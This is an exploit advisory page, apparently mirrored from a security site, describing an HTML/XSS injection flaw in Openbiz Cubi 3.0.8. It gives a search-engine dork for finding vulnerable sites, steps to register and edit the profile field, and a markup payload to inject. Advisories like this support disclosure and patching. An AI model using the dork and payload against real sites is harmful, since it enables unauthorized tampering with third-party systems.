Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070021

Below is a copy:

Openbiz Cubi 3.0.8 Xss/Html inject Upload Vulnerability
====================================================================================================================================
| # Title     : Openbiz Cubi 3.0.8 Xss/Html inject Upload Vulnerability                                                            |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | 
| # Vendor    : https://code.google.com/archive/p/openbiz-cubi/downloads                                                           |  
| # Dork      : " System Login - Cubi Platform "                                                                                   |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Register new user .

[+] go to your profile and edit Miscellaneous .

[+] Use Payload : 

</tr>
    <td align="center"><a href="https://packetstormsecurity.com/files/authors/7697"><img src="https://packetstatic.com/img1398360120/ps_logo.png" alt="" width="650" height="120" border="0" /></a>
</tr>

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.